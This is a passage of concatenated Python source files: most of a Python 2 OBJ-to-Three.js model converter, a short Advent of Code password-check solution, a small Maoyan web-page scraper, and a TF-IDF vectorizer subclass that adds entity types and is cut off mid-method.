if chunks[0] == "map_Kd" and len(chunks) == 2:
materials[identifier]["mapDiffuse"] = texture_relative_path(chunks[1])
# Ambient texture
# map_Ka texture_ambient.jpg
if chunks[0] == "map_Ka" and len(chunks) == 2:
materials[identifier]["mapAmbient"] = texture_relative_path(chunks[1])
# Specular texture
# map_Ks texture_specular.jpg
if chunks[0] == "map_Ks" and len(chunks) == 2:
materials[identifier]["mapSpecular"] = texture_relative_path(chunks[1])
# Alpha texture
# map_d texture_alpha.png
if chunks[0] == "map_d" and len(chunks) == 2:
materials[identifier]["mapAlpha"] = texture_relative_path(chunks[1])
# Bump texture
# map_bump texture_bump.jpg or bump texture_bump.jpg
if (chunks[0] == "map_bump" or chunks[0] == "bump") and len(chunks) == 2:
materials[identifier]["mapBump"] = texture_relative_path(chunks[1])
# Illumination
# illum 2
#
# 0. Color on and Ambient off
# 1. Color on and Ambient on
# 2. Highlight on
# 3. Reflection on and Ray trace on
# 4. Transparency: Glass on, Reflection: Ray trace on
# 5. Reflection: Fresnel on and Ray trace on
# 6. Transparency: Refraction on, Reflection: Fresnel off and Ray trace on
# 7. Transparency: Refraction on, Reflection: Fresnel on and Ray trace on
# 8. Reflection on and Ray trace off
# 9. Transparency: Glass on, Reflection: Ray trace off
# 10. Casts shadows onto invisible surfaces
if chunks[0] == "illum" and len(chunks) == 2:
materials[identifier]["illumination"] = int(chunks[1])
return materials
# #####################################################
# OBJ parser
# #####################################################
def parse_vertex(text):
"""Parse text chunk specifying single vertex.
Possible formats:
vertex index
vertex index / texture index
vertex index / texture index / normal index
vertex index / / normal index
"""
v = 0
t = 0
n = 0
chunks = text.split("/")
v = int(chunks[0])
if len(chunks) > 1:
if chunks[1]:
t = int(chunks[1])
if len(chunks) > 2:
if chunks[2]:
n = int(chunks[2])
return { 'v':v, 't':t, 'n':n }
def parse_obj(fname):
"""Parse OBJ file.
"""
vertices = []
normals = []
uvs = []
faces = []
materials = {}
mcounter = 0
mcurrent = 0
mtllib = ""
# current face state
group = 0
object = 0
smooth = 0
for line in fileinput.input(fname):
chunks = line.split()
if len(chunks) > 0:
# Vertices as (x,y,z) coordinates
# v 0.123 0.234 0.345
if chunks[0] == "v" and len(chunks) == 4:
x = float(chunks[1])
y = float(chunks[2])
z = float(chunks[3])
vertices.append([x,y,z])
# Normals in (x,y,z) form; normals might not be unit
# vn 0.707 0.000 0.707
if chunks[0] == "vn" and len(chunks) == 4:
x = float(chunks[1])
y = float(chunks[2])
z = float(chunks[3])
normals.append([x,y,z])
# Texture coordinates in (u,v[,w]) coordinates, w is optional
# vt 0.500 -1.352 [0.234]
if chunks[0] == "vt" and len(chunks) >= 3:
u = float(chunks[1])
v = float(chunks[2])
w = 0
if len(chunks)>3:
w = float(chunks[3])
uvs.append([u,v,w])
# Face
if chunks[0] == "f" and len(chunks) >= 4:
vertex_index = []
uv_index = []
normal_index = []
for v in chunks[1:]:
vertex = parse_vertex(v)
if vertex['v']:
vertex_index.append(vertex['v'])
if vertex['t']:
uv_index.append(vertex['t'])
if vertex['n']:
normal_index.append(vertex['n'])
faces.append({
'vertex':vertex_index,
'uv':uv_index,
'normal':normal_index,
'material':mcurrent,
'group':group,
'object':object,
'smooth':smooth,
})
# Group
if chunks[0] == "g" and len(chunks) == 2:
group = chunks[1]
# Object
if chunks[0] == "o" and len(chunks) == 2:
object = chunks[1]
# Materials definition
if chunks[0] == "mtllib" and len(chunks) == 2:
mtllib = chunks[1]
# Material
if chunks[0] == "usemtl" and len(chunks) == 2:
material = chunks[1]
if not material in materials:
mcurrent = mcounter
materials[material] = mcounter
mcounter += 1
else:
mcurrent = materials[material]
# Smooth shading
if chunks[0] == "s" and len(chunks) == 2:
smooth = chunks[1]
return faces, vertices, uvs, normals, materials, mtllib
# #####################################################
# Generator - faces
# #####################################################
def setBit(value, position, on):
if on:
mask = 1 << position
return (value | mask)
else:
mask = ~(1 << position)
return (value & mask)
def generate_face(f, fc):
isTriangle = ( len(f['vertex']) == 3 )
if isTriangle:
nVertices = 3
else:
nVertices = 4
hasMaterial = True # for the moment OBJs without materials get default material
hasFaceUvs = False # not supported in OBJ
hasFaceVertexUvs = ( len(f['uv']) >= nVertices )
hasFaceNormals = False # don't export any face normals (as they are computed in engine)
hasFaceVertexNormals = ( len(f["normal"]) >= nVertices and SHADING == "smooth" )
hasFaceColors = BAKE_COLORS
hasFaceVertexColors = False # not supported in OBJ
faceType = 0
faceType = setBit(faceType, 0, not isTriangle)
faceType = setBit(faceType, 1, hasMaterial)
faceType = setBit(faceType, 2, hasFaceUvs)
faceType = setBit(faceType, 3, hasFaceVertexUvs)
faceType = setBit(faceType, 4, hasFaceNormals)
faceType = setBit(faceType, 5, hasFaceVertexNormals)
faceType = setBit(faceType, 6, hasFaceColors)
faceType = setBit(faceType, 7, hasFaceVertexColors)
faceData = []
# order is important, must match order in JSONLoader
# face type
# vertex indices
# material index
# face uvs index
# face vertex uvs indices
# face normal index
# face vertex normals indices
# face color index
# face vertex colors indices
faceData.append(faceType)
# must clamp in case on polygons bigger than quads
for i in xrange(nVertices):
index = f['vertex'][i] - 1
faceData.append(index)
faceData.append( f['material'] )
if hasFaceVertexUvs:
for i in xrange(nVertices):
index = f['uv'][i] - 1
faceData.append(index)
if hasFaceVertexNormals:
for i in xrange(nVertices):
index = f['normal'][i] - 1
faceData.append(index)
if hasFaceColors:
index = fc['material']
faceData.append(index)
return ",".join( map(str, faceData) )
# #####################################################
# Generator - chunks
# #####################################################
def hexcolor(c):
return ( int(c[0] * 255) << 16 ) + ( int(c[1] * 255) << 8 ) + int(c[2] * 255)
def generate_vertex(v, option_vertices_truncate, scale):
if not option_vertices_truncate:
return TEMPLATE_VERTEX % (v[0], v[1], v[2])
else:
return TEMPLATE_VERTEX_TRUNCATE % (scale * v[0], scale * v[1], scale * v[2])
def generate_normal(n):
return TEMPLATE_N % (n[0], n[1], n[2])
def generate_uv(uv):
return TEMPLATE_UV % (uv[0], 1.0 - uv[1])
def generate_color_rgb(c):
return TEMPLATE_COLOR % (c[0], c[1], c[2])
def generate_color_decimal(c):
return TEMPLATE_COLOR_DEC % hexcolor(c)
def generate_edge(e):
return TEMPLATE_EDGE % (e[0], e[1])
# #####################################################
# Morphs
# #####################################################
def generate_morph_vertex(name, vertices):
vertex_string = ",".join(generate_vertex(v, TRUNCATE, SCALE) for v in vertices)
return TEMPLATE_MORPH_VERTICES % (name, vertex_string)
def generate_morph_color(name, colors):
color_string = ",".join(generate_color_rgb(c) for c in colors)
return TEMPLATE_MORPH_COLORS % (name, color_string)
def extract_material_colors(materials, mtlfilename, basename):
"""Extract diffuse colors from MTL materials
"""
if not materials:
materials = { 'default': 0 }
mtl = create_materials(materials, mtlfilename, basename)
mtlColorArraySrt = []
for m in mtl:
if m in materials:
index = materials[m]
color = mtl[m].get("colorDiffuse", [1,0,0])
mtlColorArraySrt.append([index, color])
mtlColorArraySrt.sort()
mtlColorArray = [x[1] for x in mtlColorArraySrt]
return mtlColorArray
def extract_face_colors(faces, material_colors):
"""Extract colors from materials and assign them to faces
"""
faceColors = []
for face in faces:
material_index = face['material']
faceColors.append(material_colors[material_index])
return faceColors
def generate_morph_targets(morphfiles, n_vertices, infile):
skipOriginalMorph = False
norminfile = os.path.normpath(infile)
morphVertexData = []
for mfilepattern in morphfiles.split():
matches = glob.glob(mfilepattern)
matches.sort()
indices = range(0, len(matches), FRAMESTEP)
for i in indices:
path = matches[i]
normpath = os.path.normpath(path)
if normpath != norminfile or not skipOriginalMorph:
name = os.path.basename(normpath)
morphFaces, morphVertices, morphUvs, morphNormals, morphMaterials, morphMtllib = parse_obj(normpath)
n_morph_vertices = len(morphVertices)
if n_vertices != n_morph_vertices:
print "WARNING: skipping morph [%s] with different number of vertices [%d] than the original model [%d]" % (name, n_morph_vertices, n_vertices)
else:
if ALIGN == "center":
center(morphVertices)
elif ALIGN == "centerxz":
centerxz(morphVertices)
elif ALIGN == "bottom":
bottom(morphVertices)
elif ALIGN == "top":
top(morphVertices)
morphVertexData.append((get_name(name), morphVertices))
print "adding [%s] with %d vertices" % (name, n_morph_vertices)
morphTargets = ""
if len(morphVertexData):
morphTargets = "\n%s\n\t" % ",\n".join(generate_morph_vertex(name, vertices) for name, vertices in morphVertexData)
return morphTargets
def generate_morph_colors(colorfiles, n_vertices, n_faces):
morphColorData = []
colorFaces = []
materialColors = []
for mfilepattern in colorfiles.split():
matches = glob.glob(mfilepattern)
matches.sort()
for path in matches:
normpath = os.path.normpath(path)
name = os.path.basename(normpath)
morphFaces, morphVertices, morphUvs, morphNormals, morphMaterials, morphMtllib = parse_obj(normpath)
n_morph_vertices = len(morphVertices)
n_morph_faces = len(morphFaces)
if n_vertices != n_morph_vertices:
print "WARNING: skipping morph color map [%s] with different number of vertices [%d] than the original model [%d]" % (name, n_morph_vertices, n_vertices)
elif n_faces != n_morph_faces:
print "WARNING: skipping morph color map [%s] with different number of faces [%d] than the original model [%d]" % (name, n_morph_faces, n_faces)
else:
morphMaterialColors = extract_material_colors(morphMaterials, morphMtllib, normpath)
morphFaceColors = extract_face_colors(morphFaces, morphMaterialColors)
morphColorData.append((get_name(name), morphFaceColors))
# take first color map for baking into face colors
if len(colorFaces) == 0:
colorFaces = morphFaces
materialColors = morphMaterialColors
print "adding [%s] with %d face colors" % (name, len(morphFaceColors))
morphColors = ""
if len(morphColorData):
morphColors = "\n%s\n\t" % ",\n".join(generate_morph_color(name, colors) for name, colors in morphColorData)
return morphColors, colorFaces, materialColors
# #####################################################
# Edges
# #####################################################
def edge_hash(a, b):
return "%d_%d" % (min(a, b), max(a, b))
def add_unique_edge(a, b, edge_set, edges):
h = edge_hash(a[0], b[0])
if h not in edge_set:
x = min(a[1], b[1])
y = max(a[1], b[1])
edges.append([x, y])
edge_set.add(h)
def compute_edges(faces, vertices):
edges = []
# compute unique vertices
unique_vertices = {}
vertex_count = 0
for i, v in enumerate(vertices):
key = veckey3(v)
if key not in unique_vertices:
unique_vertices[key] = [vertex_count, i]
vertex_count += 1
# find edges between unique vertices
edge_set = set()
for f in faces:
vertex_indices = f["vertex"]
unique_indices = []
for vi in vertex_indices:
v = vertices[vi - 1]
key = veckey3(v)
unique_indices.append(unique_vertices[key])
if len(unique_indices) == 3:
a = unique_indices[0]
b = unique_indices[1]
c = unique_indices[2]
add_unique_edge(a, b, edge_set, edges)
add_unique_edge(b, c, edge_set, edges)
add_unique_edge(a, c, edge_set, edges)
elif len(unique_indices) == 4:
a = unique_indices[0]
b = unique_indices[1]
c = unique_indices[2]
d = unique_indices[3]
# this should be inside edge of quad, should it go in?
# add_unique_edge(b, d, edge_set, edges)
add_unique_edge(a, b, edge_set, edges)
add_unique_edge(a, d, edge_set, edges)
add_unique_edge(b, c, edge_set, edges)
add_unique_edge(c, d, edge_set, edges)
edges.sort()
return edges
# #####################################################
# Materials
# #####################################################
def generate_color(i):
"""Generate hex color corresponding to integer.
Colors should have well defined ordering.
First N colors are hardcoded, then colors are random
(must seed random number generator with deterministic value
before getting colors).
"""
if i < len(COLORS):
#return "0x%06x" % COLORS[i]
return COLORS[i]
else:
#return "0x%06x" % int(0xffffff * random.random())
return int(0xffffff * random.random())
def value2string(v):
if type(v)==str and v[0:2] != "0x":
return '"%s"' % v
elif type(v) == bool:
return str(v).lower()
return str(v)
def generate_materials(mtl, materials):
"""Generate JS array of materials objects
JS material objects are basically prettified one-to-one
mappings of MTL properties in JSON format.
"""
mtl_array = []
for m in mtl:
if m in materials:
index = materials[m]
# add debug information
# materials should be sorted according to how
# they appeared in OBJ file (for the first time)
# this index is identifier used in face definitions
mtl[m]['DbgName'] = m
mtl[m]['DbgIndex'] = index
mtl[m]['DbgColor'] = generate_color(index)
if BAKE_COLORS:
mtl[m]['vertexColors'] = "face"
mtl_raw = ",\n".join(['\t"%s" : %s' % (n, value2string(v)) for n,v in sorted(mtl[m].items())])
mtl_string = "\t{\n%s\n\t}" % mtl_raw
mtl_array.append([index, mtl_string])
return ",\n\n".join([m for i,m in sorted(mtl_array)])
def generate_mtl(materials):
"""Generate dummy materials (if there is no MTL file).
"""
mtl = {}
for m in materials:
index = materials[m]
mtl[m] = {
'DbgName': m,
'DbgIndex': index,
'DbgColor': generate_color(index)
}
return mtl
def generate_materials_string(materials, mtlfilename, basename):
"""Generate final materials string.
"""
if not materials:
materials = { 'default': 0 }
mtl = create_materials(materials, mtlfilename, basename)
return generate_materials(mtl, materials)
def create_materials(materials, mtlfilename, basename):
"""Parse MTL file and create mapping between its materials and OBJ materials.
Eventual edge cases are handled here (missing materials, missing MTL file).
"""
random.seed(42) # to get well defined color order for debug colors
# default materials with debug colors for when
# there is no specified MTL / MTL loading failed,
# or if there were no materials / null materials
mtl = generate_mtl(materials)
if mtlfilename:
# create full pathname for MTL (included from OBJ)
path = os.path.dirname(basename)
fname = os.path.join(path, mtlfilename)
if file_exists(fname):
# override default materials with real ones from MTL
# (where they exist, otherwise keep defaults)
mtl.update(parse_mtl(fname))
else:
print "Couldn't find [%s]" % fname
return mtl
# #####################################################
# Faces
# #####################################################
def is_triangle_flat(f):
return len(f['vertex'])==3 and not (f["normal"] and SHADING == "smooth") and not f['uv']
def is_triangle_flat_uv(f):
return len(f['vertex'])==3 and not (f["normal"] and SHADING == "smooth") and len(f['uv'])==3
def is_triangle_smooth(f):
return len(f['vertex'])==3 and f["normal"] and SHADING == "smooth" and not f['uv']
def is_triangle_smooth_uv(f):
return len(f['vertex'])==3 and f["normal"] and SHADING == "smooth" and len(f['uv'])==3
def is_quad_flat(f):
return len(f['vertex'])==4 and not (f["normal"] and SHADING == "smooth") and not f['uv']
def is_quad_flat_uv(f):
return len(f['vertex'])==4 and not (f["normal"] and SHADING == "smooth") and len(f['uv'])==4
def is_quad_smooth(f):
return len(f['vertex'])==4 and f["normal"] and SHADING == "smooth" and not f['uv']
def is_quad_smooth_uv(f):
return len(f['vertex'])==4 and f["normal"] and SHADING == "smooth" and len(f['uv'])==4
def sort_faces(faces):
data = {
'triangles_flat': [],
'triangles_flat_uv': [],
'triangles_smooth': [],
'triangles_smooth_uv': [],
'quads_flat': [],
'quads_flat_uv': [],
'quads_smooth': [],
'quads_smooth_uv': []
}
for f in faces:
if is_triangle_flat(f):
data['triangles_flat'].append(f)
elif is_triangle_flat_uv(f):
data['triangles_flat_uv'].append(f)
elif is_triangle_smooth(f):
data['triangles_smooth'].append(f)
elif is_triangle_smooth_uv(f):
data['triangles_smooth_uv'].append(f)
elif is_quad_flat(f):
data['quads_flat'].append(f)
elif is_quad_flat_uv(f):
data['quads_flat_uv'].append(f)
elif is_quad_smooth(f):
data['quads_smooth'].append(f)
elif is_quad_smooth_uv(f):
data['quads_smooth_uv'].append(f)
return data
# #####################################################
# API - ASCII converter
# #####################################################
def convert_ascii(infile, morphfiles, colorfiles, outfile):
"""Convert infile.obj to outfile.js
Here is where everything happens. If you need to automate conversions,
just import this file as Python module and call this method.
"""
if not file_exists(infile):
print "Couldn't find [%s]" % infile
return
# parse OBJ / MTL files
faces, vertices, uvs, normals, materials, mtllib = parse_obj(infile)
n_vertices = len(vertices)
n_faces = len(faces)
# align model
if ALIGN == "center":
center(vertices)
elif ALIGN == "centerxz":
centerxz(vertices)
elif ALIGN == "bottom":
bottom(vertices)
elif ALIGN == "top":
top(vertices)
# generate normals string
nnormal = 0
normals_string = ""
if SHADING == "smooth":
normals_string = ",".join(generate_normal(n) for n in normals)
nnormal = len(normals)
# extract morph vertices
morphTargets = generate_morph_targets(morphfiles, n_vertices, infile)
# extract morph colors
morphColors, colorFaces, materialColors = generate_morph_colors(colorfiles, n_vertices, n_faces)
# generate colors string
ncolor = 0
colors_string = ""
if len(colorFaces) < len(faces):
colorFaces = faces
materialColors = extract_material_colors(materials, mtllib, infile)
if BAKE_COLORS:
colors_string = ",".join(generate_color_decimal(c) for c in materialColors)
ncolor = len(materialColors)
# generate edges string
nedge = 0
edges_string = ""
if EXPORT_EDGES:
edges = compute_edges(faces, vertices)
nedge = len(edges)
edges_string = ",".join(generate_edge(e) for e in edges)
# generate ascii model string
text = TEMPLATE_FILE_ASCII % {
"name" : get_name(outfile),
"fname" : infile,
"nvertex" : len(vertices),
"nface" : len(faces),
"nuv" : len(uvs),
"nnormal" : nnormal,
"ncolor" : ncolor,
"nmaterial" : len(materials),
"nedge" : nedge,
"materials" : generate_materials_string(materials, mtllib, infile),
"normals" : normals_string,
"colors" : colors_string,
"uvs" : ",".join(generate_uv(uv) for uv in uvs),
"vertices" : ",".join(generate_vertex(v, TRUNCATE, SCALE) for v in vertices),
"morphTargets" : morphTargets,
"morphColors" : morphColors,
"faces" : ",".join(generate_face(f, fc) for f, fc in zip(faces, colorFaces)),
"edges" : edges_string,
"scale" : SCALE
}
out = open(outfile, "w")
out.write(text)
out.close()
print "%d vertices, %d faces, %d materials" % (len(vertices), len(faces), len(materials))
# #############################################################################
# API - Binary converter
# #############################################################################
def convert_binary(infile, outfile):
"""Convert infile.obj to outfile.js + outfile.bin
"""
if not file_exists(infile):
print "Couldn't find [%s]" % infile
return
binfile = get_name(outfile) + ".bin"
faces, vertices, uvs, normals, materials, mtllib = parse_obj(infile)
if ALIGN == "center":
center(vertices)
elif ALIGN == "centerxz":
centerxz(vertices)
elif ALIGN == "bottom":
bottom(vertices)
elif ALIGN == "top":
top(vertices)
sfaces = sort_faces(faces)
# ###################
# generate JS file
# ###################
text = TEMPLATE_FILE_BIN % {
"name" : get_name(outfile),
"materials" : generate_materials_string(materials, mtllib, infile),
"buffers" : binfile,
"fname" : infile,
"nvertex" : len(vertices),
"nface" : len(faces),
"nmaterial" : len(materials)
}
out = open(outfile, "w")
out.write(text)
out.close()
# ###################
# generate BIN file
# ###################
if SHADING == "smooth":
nnormals = len(normals)
else:
nnormals = 0
buffer = []
# header
# ------
header_bytes = struct.calcsize('<8s')
header_bytes += struct.calcsize('<BBBBBBBB')
header_bytes += struct.calcsize('<IIIIIIIIIII')
# signature
signature = struct.pack('<8s', 'Three.js')
# metadata (all data is little-endian)
vertex_coordinate_bytes = 4
normal_coordinate_bytes = 1
uv_coordinate_bytes = 4
vertex_index_bytes = 4
normal_index_bytes = 4
uv_index_bytes = 4
material_index_bytes = 2
# header_bytes unsigned char 1
# vertex_coordinate_bytes unsigned char 1
# normal_coordinate_bytes unsigned char 1
# uv_coordinate_bytes unsigned char 1
# vertex_index_bytes unsigned char 1
# normal_index_bytes unsigned char 1
# uv_index_bytes unsigned char 1
# material_index_bytes unsigned char 1
bdata = struct.pack('<BBBBBBBB', header_bytes,
vertex_coordinate_bytes,
normal_coordinate_bytes,
uv_coordinate_bytes,
vertex_index_bytes,
normal_index_bytes,
uv_index_bytes,
material_index_bytes)
# nvertices unsigned int 4
# nnormals unsigned int 4
# nuvs unsigned int 4
# ntri_flat unsigned int 4
# ntri_smooth unsigned int 4
# ntri_flat_uv unsigned int 4
# ntri_smooth_uv unsigned int 4
# nquad_flat unsigned int 4
# nquad_smooth unsigned int 4
# nquad_flat_uv unsigned int 4
# nquad_smooth_uv unsigned int 4
ndata = struct.pack('<IIIIIIIIIII', len(vertices),
nnormals,
len(uvs),
len(sfaces['triangles_flat']),
len(sfaces['triangles_smooth']),
len(sfaces['triangles_flat_uv']),
len(sfaces['triangles_smooth_uv']),
len(sfaces['quads_flat']),
len(sfaces['quads_smooth']),
len(sfaces['quads_flat_uv']),
len(sfaces['quads_smooth_uv']))
buffer.append(signature)
buffer.append(bdata)
buffer.append(ndata)
# 1. vertices
# ------------
# x float 4
# y float 4
# z float 4
for v in vertices:
data = struct.pack('<fff', v[0], v[1], v[2])
buffer.append(data)
# 2. normals
# ---------------
# x signed char 1
# y signed char 1
# z signed char 1
if SHADING == "smooth":
for n in normals:
normalize(n)
data = struct.pack('<bbb', math.floor(n[0]*127+0.5),
math.floor(n[1]*127+0.5),
math.floor(n[2]*127+0.5))
buffer.append(data)
# 3. uvs
# -----------
# u float 4
# v float 4
for uv in uvs:
data = struct.pack('<ff', uv[0], 1.0-uv[1])
buffer.append(data)
# 4. flat triangles
# ------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# m unsigned short 2
for f in sfaces['triangles_flat']:
vi = f['vertex']
data = struct.pack('<IIIH',
vi[0]-1, vi[1]-1, vi[2]-1,
f['material'])
buffer.append(data)
# 5. smooth triangles
# -------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# m unsigned short 2
# na unsigned int 4
# nb unsigned int 4
# nc unsigned int 4
for f in sfaces['triangles_smooth']:
vi = f['vertex']
ni = f['normal']
data = struct.pack('<IIIHIII',
vi[0]-1, vi[1]-1, vi[2]-1,
f['material'],
ni[0]-1, ni[1]-1, ni[2]-1)
buffer.append(data)
# 6. flat triangles uv
# --------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# m unsigned short 2
# ua unsigned int 4
# ub unsigned int 4
# uc unsigned int 4
for f in sfaces['triangles_flat_uv']:
vi = f['vertex']
ui = f['uv']
data = struct.pack('<IIIHIII',
vi[0]-1, vi[1]-1, vi[2]-1,
f['material'],
ui[0]-1, ui[1]-1, ui[2]-1)
buffer.append(data)
# 7. smooth triangles uv
# ----------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# m unsigned short 2
# na unsigned int 4
# nb unsigned int 4
# nc unsigned int 4
# ua unsigned int 4
# ub unsigned int 4
# uc unsigned int 4
for f in sfaces['triangles_smooth_uv']:
vi = f['vertex']
ni = f['normal']
ui = f['uv']
data = struct.pack('<IIIHIIIIII',
vi[0]-1, vi[1]-1, vi[2]-1,
f['material'],
ni[0]-1, ni[1]-1, ni[2]-1,
ui[0]-1, ui[1]-1, ui[2]-1)
buffer.append(data)
# 8. flat quads
# ------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# d unsigned int 4
# m unsigned short 2
for f in sfaces['quads_flat']:
vi = f['vertex']
data = struct.pack('<IIIIH',
vi[0]-1, vi[1]-1, vi[2]-1, vi[3]-1,
f['material'])
buffer.append(data)
# 9. smooth quads
# -------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# d unsigned int 4
# m unsigned short 2
# na unsigned int 4
# nb unsigned int 4
# nc unsigned int 4
# nd unsigned int 4
for f in sfaces['quads_smooth']:
vi = f['vertex']
ni = f['normal']
data = struct.pack('<IIIIHIIII',
vi[0]-1, vi[1]-1, vi[2]-1, vi[3]-1,
f['material'],
ni[0]-1, ni[1]-1, ni[2]-1, ni[3]-1)
buffer.append(data)
# 10. flat quads uv
# ------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# d unsigned int 4
# m unsigned short 2
# ua unsigned int 4
# ub unsigned int 4
# uc unsigned int 4
# ud unsigned int 4
for f in sfaces['quads_flat_uv']:
vi = f['vertex']
ui = f['uv']
data = struct.pack('<IIIIHIIII',
vi[0]-1, vi[1]-1, vi[2]-1, vi[3]-1,
f['material'],
ui[0]-1, ui[1]-1, ui[2]-1, ui[3]-1)
buffer.append(data)
# 11. smooth quads uv
# -------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# d unsigned int 4
# m unsigned short 2
# na unsigned int 4
# nb unsigned int 4
# nc unsigned int 4
# nd unsigned int 4
# ua unsigned int 4
# ub unsigned int 4
# uc unsigned int 4
# ud unsigned int 4
for f in sfaces['quads_smooth_uv']:
vi = f['vertex']
ni = f['normal']
ui = f['uv']
data = struct.pack('<IIIIHIIIIIIII',
vi[0]-1, vi[1]-1, vi[2]-1, vi[3]-1,
f['material'],
ni[0]-1, ni[1]-1, ni[2]-1, ni[3]-1,
ui[0]-1, ui[1]-1, ui[2]-1, ui[3]-1)
buffer.append(data)
path = os.path.dirname(outfile)
fname = os.path.join(path, binfile)
out = open(fname, "wb")
out.write("".join(buffer))
out.close()
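# A minimal sketch (not part of the converter) of how a consumer could read back
# the header written above, using the same little-endian struct formats:
#
#   with open("model.bin", "rb") as f:  # hypothetical file name
#       signature = struct.unpack('<8s', f.read(struct.calcsize('<8s')))[0]
#       bdata = struct.unpack('<BBBBBBBB', f.read(struct.calcsize('<BBBBBBBB')))
#       ndata = struct.unpack('<IIIIIIIIIII', f.read(struct.calcsize('<IIIIIIIIIII')))
#   # bdata holds header_bytes plus the seven per-item byte sizes,
#   # ndata holds nvertices, nnormals, nuvs and the eight per-face-type counts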
# #############################################################################
# Helpers
# #############################################################################
def usage():
print "Usage: %s -i filename.obj -o filename.js [-m morphfiles*.obj] [-c morphcolors*.obj] [-a center|top|bottom] [-s flat|smooth] [-t binary|ascii] [-d invert|normal]" % os.path.basename(sys.argv[0])
# #####################################################
# Main
# #####################################################
if __name__ == "__main__":
# get parameters from the command line
try:
opts, args = getopt.getopt(sys.argv[1:], "hbei:m:c:b:o:a:s:t:d:x:f:", ["help", "bakecolors", "edges", "input=", "morphs=", "colors=", "output=", "align=", "shading=", "type=", "dissolve=", "truncatescale=", "framestep="])
except getopt.GetoptError:
usage()
sys.exit(2)
infile = outfile = ""
morphfiles = ""
colorfiles = ""
for o, a in opts:
if o in ("-h", "--help"):
usage()
sys.exit()
elif o in ("-i", "--input"):
infile = a
elif o in ("-m", "--morphs"):
morphfiles = a
elif o in ("-c", "--colors"):
colorfiles = a
elif o in ("-o", "--output"):
outfile = a
elif o in ("-a", "--align"):
if a in ("top", "bottom", "center", "centerxz", "none"):
ALIGN = a
elif o in ("-s", "--shading"):
if a in ("flat", "smooth"):
SHADING = a
elif o in ("-t", "--type"):
if a in ("binary", "ascii"):
TYPE = a
elif o in ("-d", "--dissolve"):
if a in ("normal", "invert"):
TRANSPARENCY = a
elif o in ("-b", "--bakecolors"):
BAKE_COLORS = True
elif o in ("-e", "--edges"):
EXPORT_EDGES = True
elif o in ("-x", "--truncatescale"):
TRUNCATE = True
SCALE = float(a)
elif o in ("-f", "--framestep"):
FRAMESTEP = int(a)
if infile == "" or outfile == "":
usage()
sys.exit(2)
print "Converting [%s] into [%s] ..." % (infile, outfile)
if morphfiles:
print "Morphs [%s]" % morphfiles
if colorfiles:
print "Colors [%s]" % colorfiles
if TYPE == "ascii":
convert_ascii(infile, morphfiles, colorfiles, outfile)
elif TYPE == "binary":
convert_binary(infile, outfile)
|
py | b4003334ec7796889b359c670631429cd7efe44b | import re
from collections import Counter
with open("puzzles/day2/puzzle_input.txt") as f:
text = f.read()
data = [row.split(":") for row in text.split("\n")]
def checksum(check: str, password: str) -> bool:
    m = re.search(r"(\d+)-(\d+) ([a-z])", check)
id1, id2, char = m.groups()
    # the leading space left in `password` by split(":") occupies index 0,
    # so the puzzle's 1-based positions map directly onto string indices
return (password[int(id1)] == char) ^ (password[int(id2)] == char)
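# e.g. "1-3 a: abcde" splits into check="1-3 a" and password=" abcde";
# password[1] == 'a' while password[3] == 'c', so exactly one position matches -> True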
solution = [checksum(check, password) for check, password in data]
print(f"answer of puzzle 2 is:", Counter(solution).get(True))
|
py | b40034640d917a0e93d55e250531c555596077da | import requests
from lxml import etree
def get_one_page(url):
    headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'}
request = requests.get(url=url,headers=headers)
if request.status_code == 200:
return request.text
    return None
def main():
url = 'https://maoyan.com/board/4'
content=get_one_page(url)
write_to_file(content)
html=etree.parse('./test.html',etree.HTMLParser())
    result=html.xpath('//a[@href="/films/1203"]/@title')
print(result)
def write_to_file(content):
with open ('./test.html','w',encoding='utf-8') as f:
f.write(content)
if __name__=='__main__':
main()
|
py | b400347a22c41756d3b10d851c9fde4b222593b1 | """Self-defined vectorizer"""
import numpy as np
from typing import List
from sklearn.feature_extraction.text import TfidfVectorizer
class TfidfVectorizerWithEntity(TfidfVectorizer):
"""Subclass of TfidfVectorizer to support entity types"""
def __init__(self, input='content', encoding='utf-8',
decode_error='strict', strip_accents=None, lowercase=True,
preprocessor=None, tokenizer=None, analyzer='word',
stop_words=None, token_pattern=r"(?u)\b\w\w+\b",
ngram_range=(1, 1), max_df=1.0, min_df=1,
max_features=None, vocabulary=None, binary=False,
dtype=np.float64, norm='l2', use_idf=True, smooth_idf=True,
sublinear_tf=False, ner=None):
"""
Parameters
----------
ner: instance of named entity recognition.
Its output, taking "Allen like cake." for example,
should be a list in form:
[
{'value': 'Allen', 'type': 'person', 'start': 0, 'end': 5},
{'value': 'cake', 'type': 'food', 'start': 11, 'end': 15}
]
Other Parameters: see comments of TfidfVectorizer
"""
super().__init__(
input=input, encoding=encoding, decode_error=decode_error,
strip_accents=strip_accents, lowercase=lowercase,
preprocessor=preprocessor, tokenizer=tokenizer, analyzer=analyzer,
stop_words=stop_words, token_pattern=token_pattern,
ngram_range=ngram_range, max_df=max_df, min_df=min_df,
max_features=max_features, vocabulary=vocabulary, binary=binary,
dtype=dtype, norm=norm, use_idf=use_idf, smooth_idf=smooth_idf,
sublinear_tf=sublinear_tf)
self._ner = ner
def _mixed_documents(self, raw_documents) -> List[str]:
"""
Mix documents with ner types - simply insert the ner types
before raw documents. Example:
        raw document: "Allen like cake."
ner results: [
{'value': 'Allen', 'type': 'person', 'start': 0, 'end': 5},
{'value': 'cake', 'type': 'food', 'start': 11, 'end': 15}
]
        mixed document: "{person} {food} Allen like cake."
Parameters
----------
raw_documents: an iterable which yields str
Returns
-------
mixed documents, a list of str
"""
if not self._ner:
return raw_documents
mixed_documents = []
for doc in raw_documents:
entities = [
"{" + entity["type"] + "}" for entity in self._ner.process(doc)]
if entities:
mixed_documents.append(" ".join(entities) + " " + doc)
else:
mixed_documents.append(doc)
return mixed_documents
def fit(self, raw_documents, y=None):
return super().fit(self._mixed_documents(raw_documents), y)
def fit_transform(self, raw_documents, y=None):
